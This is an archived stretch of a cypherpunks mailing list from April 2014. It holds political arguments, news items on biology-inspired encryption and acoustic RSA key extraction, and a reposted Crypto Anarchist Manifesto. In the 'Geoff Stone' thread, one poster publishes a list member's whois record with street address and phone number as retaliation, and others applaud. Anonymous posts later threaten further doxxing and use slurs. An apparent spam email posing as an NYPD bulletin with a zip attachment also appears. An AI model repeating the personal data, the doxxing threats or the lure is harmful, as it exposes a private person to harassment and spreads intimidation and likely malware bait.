@carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1641 bytes Desc: not available URL: From juan.g71 at gmail.com Fri Apr 4 14:48:38 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Fri, 04 Apr 2014 18:48:38 -0300 Subject: Geoff Stone, Obama's Review Group - Part 2 In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: <5CABDDDF0D3FDF731E730A9F@F74D39FA044AA309EAEA14B9> --On Thursday, April 03, 2014 8:12 PM +0000 Cari Machet wrote: > > yay to think the military would not want to expand its mandate when rummy > fought so hard for them to get ahead of the cia ... competition is weird > though it is possible - what are the thoughts on the cia as opposed to the > military running the drone program in this regard ? the pentagon was gonna > run it then it was decided no... Different government agencies are...just that. Different facets of the same organization. > > the competition between different agencies in the us is bazzzarrio i > cannot imagine how they deal with all the subcontractors - i am sure they > figure out ways to be cruel to them There may be some 'competition' in the sense that they have to somehow divide the spoils 'fairly', but there's isn't any real competition in a monolithic criminal organization where all people agree on the core statist philosophy. Including the fucktards who pretend to be 'libertarians' and advocate 'limited' murder, I mean, 'government'. > > the thing is that there are different entities 'running the show' mostly > its your good ole transnational corporations and fucking autocrats - basic > mafia shit the junta aspect of the so called gov is just an arm of the > transnationals... They are partners. Furthermore, while companies, *in theory* exist only to serve customers, governments *in theory and practice* exist only to steal, extort, kidnap, murder, etc. >ever been to the straight of hormuz? no... > > to put the military beyond the transnationals is beyond naive its complete > blindness I don't. Politicians and 'business leaders' should be both hanged by their balls. > > >> >> >> >> > However, the pols, and CIA, wanted that very excess, >> > in particular for spying inside the US, ostensibly banned for the >> > CIA but now needed for terrorists inside. >> > >> > CIA (long FBI opponents) thought FBI could not cope with inside >> > terrorists, using 9/11 as an example, and advocated NSA involvement >> > with its much greater technical capability, but more importantly, its >> > military-privileged secrecy not susceptible to full congressional >> > oversight, courts and FOIA. >> > >> > The joint CIA-NSA Special Collection Service (SCS) has >> > been doing for decades what NSA is now alone accused of doing: >> > CIA provided the targets, NSA did the technical collection from >> > those global stations identified by xKeyscore (most in embassies >> > or nearby). >> > >> > What is bizarre is how little CIA is mentioned in news furor about >> > NSA, as if NSA did its work in isolation from the IC and without >> > oversight of the 3 branches. >> > >> > SCS also does burglaries, code snatches, decrypts, doc drops, >> > stings, ploys, blackmail, the panoply of CIA operations. The increased >> > civilian target panoply bestowed upon NSA came from CIA demands >> > channeled through ODNI. >> > >> > Reviewing what little has been released of the Snowden documents >> > they are quite similar to what SCS has been doing with the addition >> > of the US as target. FISA had to be rejiggered for the US domain. >> > >> > Most national leaders, like POTUS, are considered to be military >> > commanders thus fair game for NSA along with CIA. Nothing >> > exceptional about the recent revelations of spying on chiefs of >> > state. >> > >> > NSA technical collection capability was developed for the >> > military, not civilian use. Now expanded to CIA full dominance >> > territory. FISA had to be rejiggered for using it against civilians. >> > And is still being rejiggered these days. >> > >> > NSA's recent attempt to slough off Cybercom and return to >> > its military mission, has been rejected by the civilian overseers >> > following CIA guidance and fear-mongering of civilians, especially >> > those inside the US. The last thing CIA and its supporters want >> > is a revelation of its manipulation of civilian leaders >> > institutionalized by the 1947 National Security Act (also opposed by >> > the military). >> > >> > ----- >> > From ALERT at nyc.gov Fri Apr 4 12:05:09 2014 From: ALERT at nyc.gov (ALERT at nyc.gov) Date: Fri, 4 Apr 2014 21:05:09 +0200 Subject: Homicide Suspect Message-ID: <63049.3010706@nyc.gov> Bulletin Headline: HOMICIDE SUSPECT Sending Agency: New York City Police Sending Location: US - NY - New York Police Bulletin Case#: 14-71643 Bulletin Author: BARILLAS #7351 Sending User #: 07183 APBnet Version: 238568 The bulletin is a pdf attachment to this email. The Adobe Reader (from Adobe.com) will display and print the bulletin best. You can Not reply to the bulletin by clicking on the Reply button in your email software. -------------- next part -------------- A non-text attachment was scrubbed... Name: Homicide-case#821.zip Type: application/zip Size: 6341 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Fri Apr 4 22:30:23 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Fri, 4 Apr 2014 22:30:23 -0700 (PDT) Subject: From Phys.org Message-ID: <1396675823.44381.YahooMailNeo@web126204.mail.ne1.yahoo.com> http://phys.org/news/2014-04-unbreakable-codes-nature.html#nRlv A revolutionary new method of encrypting confidential information has been patented by scientists at Lancaster University. Read more at: http://phys.org/news/2014-04-unbreakable-codes-nature.html#jCp They have been inspired by their discoveries from human biology, which model how the heart and lungs coordinate their rhythms by passing information between each other. A mathematical model based on the complex interaction between these organs has now been transferred to the world of modern communications.  This discovery could transform daily life which is reliant on secure electronic communications for everything from mobiles to sensor networks and the internet. Every device, from your car key to online bank account, contains different identification codes enabling information to be transferred in confidence. But the race to outwit the hackers means there is a continual demand for better encryption methods. Inspiration for the new method of encryption came from interdisciplinary research in the Physics Department (www.physics.lancs.ac.uk/research/nonlinear-and-biomedical-physics) by Dr Tomislav Stankovski, Professor Peter McClintock, and Professor Aneta Stefanovska, and the patent includes Dr Robert Young. Professor McClintock commented that this is a significant discovery. He said: "This promises an encryption scheme that is so nearly unbreakable that it will be equally unwelcome to internet criminals and official eavesdroppers." Professor Stefanovska emphasized the interdisciplinary aspect: "As so often happens with important breakthroughs, this discovery was made right on the boundary between two different subjects – because we were applying physics to biology." Dr Stankovski said: "Here we offer a novel encryption scheme derived from biology, radically different from any earlier procedure. Inspired by the time-varying nature of the cardio-respiratory coupling functions recently discovered in humans, we propose a new encryption scheme that is highly resistant to conventional methods of attack." The advantage of this discovery is that it offers an infinite number of choices for the secret encryption key shared between the sender and receiver. This makes it virtually impossible for hackers and eavesdroppers to crack the code. The new method is exceptionally resistant to interference from the random fluctuations or "noise" which affects all communications systems. It can also transmit several different information streams simultaneously, enabling all the digital devices in the home, for example, to operate on one encryption key instead of dozens of different ones.  Explore further: Advancing privacy and security in the cloud More information: Tomislav Stankovski, Peter V. E. McClintock, and Aneta Stefanovska , "Coupling Functions Enable Secure Communications," American Physical Society's journal Physical Review X, journals.aps.org/prx/abstract/10.1103/PhysRevX.4.011026 Journal reference: Physical Review X   Provided by Lancaster University Read more at: http://phys.org/news/2014-04-unbreakable-codes-nature.html#jCp -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 9734 bytes Desc: not available URL: From jamesdbell9 at yahoo.com Fri Apr 4 22:44:37 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Fri, 4 Apr 2014 22:44:37 -0700 (PDT) Subject: Acoustic bugging of computers Message-ID: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com> http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#nRlv (Phys.org) —A trio of researchers in Israel has discovered that it is possible to crack 4096-bit RSA encryption keys using a microphone to listen to high-pitch noises generated by internal computer components. Adi Shamir (co-inventor of RSA), Daniel Genkin and Eran Tromer have published a research paper describing the technique on a Tel Aviv University server. Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp Computers make noises, the researchers explain, far beyond the whirring of the fan. The CPU, for example, emits a high pitched noise as it operates, fluctuating depending on which operations it is performing—other components do likewise. Suspecting that they might be able to exploit this characteristic of computers, the researchers set about creating software to interpret noise data obtained using simple microphones and very little other equipment. They also focused exclusively on trying to achieve one single feat: deciphering an RSA encryption key. After much trial and effort, the researchers found it could be done without much effort. Listening and detecting the noise made by a computer as it processes a single character in an encryption key would be impossible, of course, so the researchers devised a method that causes the noise to be repeated enough times in a row to enable capture of its signal. And that can only happen if the attacker is able to send a cyphertext to the machine that is to be attacked and have it processed. The cyphertext contains code that causes looping. By listening to how the computer processes the cyphertext, the researchers can map the noises made by the computer as it crunches different characters, thereby allowing encryption keys sent by others to be cracked. What's perhaps most frightening about this method is how easily it can be ported to various machines. The researchers found, for example, that by using a laptop and simple hardware and software they were able to crack encryption keys on a second laptop. Next, they did the same thing using a cell phone as the listening device. They suggest it could also be packaged completely in software and sent out as malware, hacking encryption keys on infected devices and sending them back to the hacker. As a side-note, the researchers also found that low-bandwidth attacks on computers are also possible by measuring the electrical potential of a computer's chassis while the circuitry is busy doing its work.  Explore further: Researchers at Toshiba design quantum network for secure communications More information: RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis: www.tau.ac.il/~tromer/papers/acoustic-20131218.pdf Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7192 bytes Desc: not available URL: From dan at geer.org Fri Apr 4 19:44:49 2014 From: dan at geer.org (dan at geer.org) Date: Fri, 04 Apr 2014 22:44:49 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: Your message of "Fri, 04 Apr 2014 13:56:18 EDT." <533EF242.5010604@loom.cc> Message-ID: <20140405024449.EF1112280DB@palinka.tinho.net> | You may not believe in scarcity, but I know one thing for a fact. I | have a limited amount of food in my refrigerator, and a limited | tolerance for strangers in my house. You may not call that "scarcity" | but it sure sounds like scarcity to me. So I'll say it again: if I | wake up one morning and find you in my house eating my food, you-gonna | be in big trouble Lucy. And return the favor; Cari's kitchen is ostensibly at % whois Globalrevops.org ... Tech ID:CR106626965 Tech Name:Cari machet Tech Organization:carimachet Tech Street: 3123 vernon blvd Tech City:Astoria Tech State/Province:New York Tech Postal Code:11106 Tech Country:US Tech Phone:+1.6466526434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email:cari_machet at me.com From jamesdbell9 at yahoo.com Sat Apr 5 01:16:13 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Sat, 5 Apr 2014 01:16:13 -0700 (PDT) Subject: Acoustic bugging of computers In-Reply-To: References: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com> Message-ID: <1396685773.2614.YahooMailNeo@web126205.mail.ne1.yahoo.com> Well, I posted the article, but don't necessarily ratify the content.  However, I have never had much confidence in the RF (radio-frequency) security of computers.  That point was driven home to me in mid 1977, when I built a microprocessor-trainer board called a "Dyna Micro"  http://en.wikipedia.org/wiki/Single-board_computer       It was uncased, and I ran it near an AM/FM radio.  While listening to the AM band, away from an active station, it made numerous audio sounds as it went through the program of the keyboard scanner and programs that I entered.  It was obvious that information could be transfered by RF, although at the time I wasn't particularly concerned about the possibility. In about 1983, I visited Washington DC, and attended some sort of military electronics convention (invited by a customer of my company, SemiDisk Systems, Inc) and I was introduced to the concept of "Tempest" shielding.  In the summer of 2002, while a guest at the "Gated Community" of USP Atwater, California, I worked for the Federal Prison Industries ("Unicor") tearing apart electronic hardware, mostly computer monitors.  I was the only person there, either prisoner or staff, who understood what the parts were which were on the boards.  Very rarely, a computer monitor came through which I recognized was a shielded, "Tempest"-grade monitor.           Jim Bell ________________________________ From: Cypher To: jim bell Cc: "cypherpunks at cpunks.org" Sent: Saturday, April 5, 2014 12:34 AM Subject: Re: Acoustic bugging of computers >I saw this a while back and really question it's usability. While it's *technically* possible, it seems far to complex >for the average hacker and far too risky for the intel community.  People who use encryption tend to be slightly >more paranoid than the average user. Suddenly receiving a piece of encrypted, nonsense email might be >enough to get their key. But I also suspect that, in many cases, that key would quickly be revoked and >reissued.  >Sent from my mobile device On Apr 5, 2014, at 0:44, jim bell wrote: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#nRlv > > > > > >(Phys.org) —A trio of researchers in Israel has discovered that it is possible to crack 4096-bit RSA encryption keys using a microphone to listen to high-pitch noises generated by internal computer components. Adi Shamir (co-inventor of RSA), Daniel Genkin and Eran Tromer have published a research paper describing the technique on a Tel Aviv University server. > >Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp > >Computers make noises, the researchers explain, far beyond the whirring of the fan. The CPU, for example, emits a high pitched noise as it operates, fluctuating depending on which operations it is performing—other components do likewise. Suspecting that they might be able to exploit this characteristic of computers, the researchers set about creating software to interpret noise data obtained using simple microphones and very little other equipment. They also focused exclusively on trying to achieve one single feat: deciphering an RSA encryption key. After much trial and effort, the researchers found it could be done without much effort. >Listening and detecting the noise made by a computer as it processes a single character in an encryption key would be impossible, of course, so the researchers devised a method that causes the noise to be repeated enough times in a row to enable capture of its signal. And that can only happen if the attacker is able to send a cyphertext to the machine that is to be attacked and have it processed. The cyphertext contains code that causes looping. By listening to how the computer processes the cyphertext, the researchers can map the noises made by the computer as it crunches different characters, thereby allowing encryption keys sent by others to be cracked. >What's perhaps most frightening about this method is how easily it can be ported to various machines. The researchers found, for example, that by using a laptop and simple hardware and software they were able to crack encryption keys on a second laptop. Next, they did the same thing using a cell phone as the listening device. They suggest it could also be packaged completely in software and sent out as malware, hacking encryption keys on infected devices and sending them back to the hacker. >As a side-note, the researchers also found that low-bandwidth attacks on computers are also possible by measuring the electrical potential of a computer's chassis while the circuitry is busy doing its work. > > Explore further: Researchers at Toshiba design quantum network for secure communications >More information: RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis: www.tau.ac.il/~tromer/papers/acoustic-20131218.pdf > > >Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp > > > > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 11823 bytes Desc: not available URL: From cypher at cpunk.us Sat Apr 5 00:34:59 2014 From: cypher at cpunk.us (Cypher) Date: Sat, 5 Apr 2014 02:34:59 -0500 Subject: Acoustic bugging of computers In-Reply-To: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com> References: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com> Message-ID: I saw this a while back and really question it's usability. While it's *technically* possible, it seems far to complex for the average hacker and far too risky for the intel community. People who use encryption tend to be slightly more paranoid than the average user. Suddenly receiving a piece of encrypted, nonsense email might be enough to get their key. But I also suspect that, in many cases, that key would quickly be revoked and reissued. Sent from my mobile device On Apr 5, 2014, at 0:44, jim bell wrote: > http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#nRlv > > > (Phys.org) —A trio of researchers in Israel has discovered that it i > s possible to crack 4096-bit RSA encryption keys using a microphone > to listen to high-pitch noises generated by internal computer compon > ents. Adi Shamir (co-inventor of RSA), Daniel Genkin and Eran Tromer > have published a research paper describing the technique on a Tel A > viv University server. > > Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp > Computers make noises, the researchers explain, far beyond the > whirring of the fan. The CPU, for example, emits a high pitched > noise as it operates, fluctuating depending on which operations it > is performing—other components do likewise. Suspecting that they mig > ht be able to exploit this characteristic of computers, the research > ers set about creating software to interpret noise data obtained usi > ng simple microphones and very little other equipment. They also foc > used exclusively on trying to achieve one single feat: deciphering a > n RSA encryption key. After much trial and effort, the researchers f > ound it could be done without much effort. > Listening and detecting the noise made by a computer as it processes > a single character in an encryption key would be impossible, of > course, so the researchers devised a method that causes the noise to > be repeated enough times in a row to enable capture of its signal. > And that can only happen if the attacker is able to send a > cyphertext to the machine that is to be attacked and have it > processed. The cyphertext contains code that causes looping. By > listening to how the computer processes the cyphertext, the > researchers can map the noises made by the computer as it crunches > different characters, thereby allowing encryption keys sent by > others to be cracked. > What's perhaps most frightening about this method is how easily it > can be ported to various machines. The researchers found, for > example, that by using a laptop and simple hardware and software > they were able to crack encryption keys on a second laptop. Next, > they did the same thing using a cell phone as the listening device. > They suggest it could also be packaged completely in software and > sent out as malware, hacking encryption keys on infected devices and > sending them back to the hacker. > As a side-note, the researchers also found that low-bandwidth > attacks on computers are also possible by measuring the electrical > potential of a computer's chassis while the circuitry is busy doing > its work. > Explore further: Researchers at Toshiba design quantum network for > secure communications > More information: RSA Key Extraction via Low-Bandwidth Acoustic > Cryptanalysis: www.tau.ac.il/~tromer/papers/acoustic-20131218.pdf > > > Read more at: http://phys.org/news/2013-12-trio-rsa-encryption-keys-noise.html#jCp > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 8241 bytes Desc: not available URL: From hettinga at gmail.com Sat Apr 5 02:18:44 2014 From: hettinga at gmail.com (Robert Hettinga) Date: Sat, 5 Apr 2014 05:18:44 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140405024449.EF1112280DB@palinka.tinho.net> References: <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: On Apr 4, 2014, at 10:44 PM, dan at geer.org wrote: > Tech ID:CR106626965 I haven’t had this much fun since the hogs at my little brother, I tellyawhut… *Munches popcorn…* Cheers, RAH -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL: From hettinga at gmail.com Sat Apr 5 02:19:52 2014 From: hettinga at gmail.com (Robert Hettinga) Date: Sat, 5 Apr 2014 05:19:52 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: On Apr 5, 2014, at 3:26 AM, Cari Machet wrote: > capitalist Dang. Long knives have come out. Cheers, RAH -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL: From hettinga at gmail.com Sat Apr 5 02:22:47 2014 From: hettinga at gmail.com (Robert Hettinga) Date: Sat, 5 Apr 2014 05:22:47 -0400 Subject: Acoustic bugging of computers In-Reply-To: References: <1396676677.34229.YahooMailNeo@web126201.mail.ne1.yahoo.com> Message-ID: <921A08FF-E764-49FC-BF58-DBFA0CE3D8E3@gmail.com> Adi’s really a hoot with this shit. Reading the keys offa smart card by using power analysis, finding the keys on a hard drive by looking for entropy, &cet. Cheers, RAH -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL: From carimachet at gmail.com Sat Apr 5 00:19:24 2014 From: carimachet at gmail.com (Cari Machet) Date: Sat, 5 Apr 2014 07:19:24 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140405024449.EF1112280DB@palinka.tinho.net> References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: what a total fuck and completely inaccurate i am not even in the US so fuck off - totally sick shit dan On Sat, Apr 5, 2014 at 2:44 AM, wrote: > > | You may not believe in scarcity, but I know one thing for a fact. I > | have a limited amount of food in my refrigerator, and a limited > | tolerance for strangers in my house. You may not call that "scarcity" > | but it sure sounds like scarcity to me. So I'll say it again: if I > | wake up one morning and find you in my house eating my food, you-gonna > | be in big trouble Lucy. > > And return the favor; Cari's kitchen is ostensibly at > > % whois Globalrevops.org > ... > Tech ID:CR106626965 > Tech Name:Cari machet > Tech Organization:carimachet > Tech Street: 3123 vernon blvd > Tech City:Astoria > Tech State/Province:New York > Tech Postal Code:11106 > Tech Country:US > Tech Phone:+1.6466526434 > Tech Phone Ext: > Tech Fax: > Tech Fax Ext: > Tech Email:cari_machet at me.com > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2309 bytes Desc: not available URL: From carimachet at gmail.com Sat Apr 5 00:26:50 2014 From: carimachet at gmail.com (Cari Machet) Date: Sat, 5 Apr 2014 07:26:50 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: dan your just a retaliating competitive little fucking capitalist YOU are whats wrong with the world petty bullshit could probably never admit you are wrong no self critic possible with your kind of psyche and this other shit about mass enslavement and oh we poor little fucks cant do nothing about nothing - have you ever even heard of the fucking enlightenment ya know before then the fucking church was your fucking slave master would you rather go back to that ??? - well a lot of super intelligent people draged humanity out of the death grip of the fucking church and monarchs > died for that shit and were imprisoned for fucking years - obviously we cant count on you fucks for any such activity fucking remotely cant even think for one fucking second On Sat, Apr 5, 2014 at 7:19 AM, Cari Machet wrote: > what a total fuck and completely inaccurate i am not even in the US so > fuck off - totally sick shit dan > > > On Sat, Apr 5, 2014 at 2:44 AM, wrote: > >> >> | You may not believe in scarcity, but I know one thing for a fact. I >> | have a limited amount of food in my refrigerator, and a limited >> | tolerance for strangers in my house. You may not call that "scarcity" >> | but it sure sounds like scarcity to me. So I'll say it again: if I >> | wake up one morning and find you in my house eating my food, you-gonna >> | be in big trouble Lucy. >> >> And return the favor; Cari's kitchen is ostensibly at >> >> % whois Globalrevops.org >> ... >> Tech ID:CR106626965 >> Tech Name:Cari machet >> Tech Organization:carimachet >> Tech Street: 3123 vernon blvd >> Tech City:Astoria >> Tech State/Province:New York >> Tech Postal Code:11106 >> Tech Country:US >> Tech Phone:+1.6466526434 >> Tech Phone Ext: >> Tech Fax: >> Tech Fax Ext: >> Tech Email:cari_machet at me.com >> >> > > > -- > Cari Machet > NYC 646-436-7795 > carimachet at gmail.com > AIM carismachet > Syria +963-099 277 3243 > Amman +962 077 636 9407 > Berlin +49 152 11779219 > Reykjavik +354 894 8650 > Twitter: @carimachet > > 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 > > Ruh-roh, this is now necessary: This email is intended only for the > addressee(s) and may contain confidential information. If you are not the > intended recipient, you are hereby notified that any use of this > information, dissemination, distribution, or copying of this email without > permission is strictly prohibited. > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4791 bytes Desc: not available URL: From carimachet at gmail.com Sat Apr 5 02:49:13 2014 From: carimachet at gmail.com (Cari Machet) Date: Sat, 5 Apr 2014 09:49:13 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <533EF242.5010604@loom.cc> <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: slime likes to group together and create cavities in peoples minds > deep holes none of you apparently have the capacity to actually make any arguments against what i write therefor have to resort to sick tactics like school children mentality how the fuck old are you supposed men? On Sat, Apr 5, 2014 at 9:19 AM, Robert Hettinga wrote: > > On Apr 5, 2014, at 3:26 AM, Cari Machet wrote: > > > capitalist > > Dang. > > Long knives have come out. > > Cheers, > RAH > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1770 bytes Desc: not available URL: From list at sysfu.com Sat Apr 5 10:27:04 2014 From: list at sysfu.com (Seth) Date: Sat, 05 Apr 2014 10:27:04 -0700 Subject: Github Pages now supports SSL In-Reply-To: <533EFC94.4060708@mit.edu> References: <533EFC94.4060708@mit.edu> Message-ID: On Fri, 04 Apr 2014 11:40:20 -0700, yan wrote: > There's even an HTTPS Everywhere rule for it already in case you *only* > want to ever access it over SSL! https://www.eff.org/https-everywhere HTTP Nowhere is also worth checking out. It can be configured to force HTTPS on all sites and connections. I prefer it over HTTPS Everywhere. https://addons.mozilla.org/en-US/firefox/addon/http-nowhere/ From carimachet at gmail.com Sat Apr 5 05:02:27 2014 From: carimachet at gmail.com (Cari Machet) Date: Sat, 5 Apr 2014 12:02:27 +0000 Subject: reminder of mays manifesto Message-ID: i post this here as a reminder of anarchist models and how they can be utilized in fascist occasions and are anti facsist but also are anti capitalist - anarchist models are found in every sector that i know of ideas of autonomy and horizontality - direct democracy but there is an overwhelming desire of some to subvert these tendencies - look for them in yourself... ++++++++++++++++++++ The Crypto Anarchist Manifesto Timothy C. May< tcmay at netcom.com> A specter is haunting the modern world, the specter of crypto anarchy. Computer technology is on the verge of providing the ability for individuals and groups to communicate and interact with each other in a totally anonymous manner. Two persons may exchange messages, conduct business, and negotiate electronic contracts without ever knowing the True Name, or legal identity, of the other. Interactions over networks will be untraceable, via extensive re- routing of encrypted packets and tamper-proof boxes which implement cryptographic protocols with nearly perfect assurance against any tampering. Reputations will be of central importance, far more important in dealings than even the credit ratings of today. These developments will alter completely the nature of government regulation, the ability to tax and control economic interactions, the ability to keep information secret, and will even alter the nature of trust and reputation. The technology for this revolution--and it surely will be both a social and economic revolution--has existed in theory for the past decade. The methods are based upon public-key encryption, zero-knowledge interactive proof systems, and various software protocols for interaction, authentication, and verification. The focus has until now been on academic conferences in Europe and the U.S., conferences monitored closely by the National Security Agency. But only recently have computer networks and personal computers attained sufficient speed to make the ideas practically realizable. And the next ten years will bring enough additional speed to make the ideas economically feasible and essentially unstoppable. High-speed networks, ISDN, tamper-proof boxes, smart cards, satellites, Ku-band transmitters, multi-MIPS personal computers, and encryption chips now under development will be some of the enabling technologies. The State will of course try to slow or halt the spread of this technology, citing national security concerns, use of the technology by drug dealers and tax evaders, and fears of societal disintegration. Many of these concerns will be valid; crypto anarchy will allow national secrets to be trade freely and will allow illicit and stolen materials to be traded. An anonymous computerized market will even make possible abhorrent markets for assassinations and extortion. Various criminal and foreign elements will be active users of CryptoNet. But this will not halt the spread of crypto anarchy. Just as the technology of printing altered and reduced the power of medieval guilds and the social power structure, so too will cryptologic methods fundamentally alter the nature of corporations and of government interference in economic transactions. Combined with emerging information markets, crypto anarchy will create a liquid market for any and all material which can be put into words and pictures. And just as a seemingly minor invention like barbed wire made possible the fencing-off of vast ranches and farms, thus altering forever the concepts of land and property rights in the frontier West, so too will the seemingly minor discovery out of an arcane branch of mathematics come to be the wire clippers which dismantle the barbed wire around intellectual property. Arise, you have nothing to lose but your barbed wire fences! -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5410 bytes Desc: not available URL: From mixmaster at remailer.privacy.at Sat Apr 5 06:47:29 2014 From: mixmaster at remailer.privacy.at (Anonymous Remailer (austria)) Date: Sat, 5 Apr 2014 15:47:29 +0200 (CEST) Subject: FAKE Indian TROLL ALERT!!(cari machet warning!) Message-ID: <825a4a4accfe4fac4d5a6b3aced63a8a@remailer.privacy.at> On Apr 5, 2014, at 3:26 AM, Cari Machet wrote: > capitalist AND You BITCH are a thieving Looter Time to DOX you and turn over all to the passport authorities/NSA!! FUCK you Cari Machet - fake indian From mixmaster at remailer.privacy.at Sat Apr 5 06:57:42 2014 From: mixmaster at remailer.privacy.at (Anonymous Remailer (austria)) Date: Sat, 5 Apr 2014 15:57:42 +0200 (CEST) Subject: FAKE Indian Cari Machet Posts RANT by WELL KNOWN Capitalist TC May.. Message-ID: <497babfff4ac2aa5147f19b389add1ad@remailer.privacy.at> U have to be the most IGNORANT fake Indian on this list.. TC May is a WELL Known Libertarian Capitalist/Randist.. Cari you are such a fucking soft headed Moron!! what a fucking rube anon time to post more DOX on Cari Machet!! From rysiek at hackerspace.pl Sat Apr 5 09:18:24 2014 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 05 Apr 2014 18:18:24 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <533EF242.5010604@loom.cc> Message-ID: <3875575.c0SDfnb8MO@lap> Dnia sobota, 5 kwietnia 2014 09:49:13 Cari Machet pisze: > slime likes to group together and create cavities in peoples minds > deep > holes > > none of you apparently have the capacity to actually make any arguments > against what i write therefor have to resort to sick tactics like school > children mentality how the fuck old are you supposed men? Thank FSM you're not calling people names, comparing them to children and questioning masculinity all around, or I wouldn't know what to think! -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Sat Apr 5 09:20:02 2014 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 05 Apr 2014 18:20:02 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140405024449.EF1112280DB@palinka.tinho.net> Message-ID: <1533024.UFgHooSaP0@lap> Dnia sobota, 5 kwietnia 2014 05:18:44 Robert Hettinga pisze: > On Apr 4, 2014, at 10:44 PM, dan at geer.org wrote: > > Tech ID:CR106626965 > > I haven’t had this much fun since the hogs at my little brother, I > tellyawhut… > > *Munches popcorn…* > > Cheers, > RAH Add a "-66 Comanche" there and watch the fireworks! -- Pozdr rysiek -------------- next part 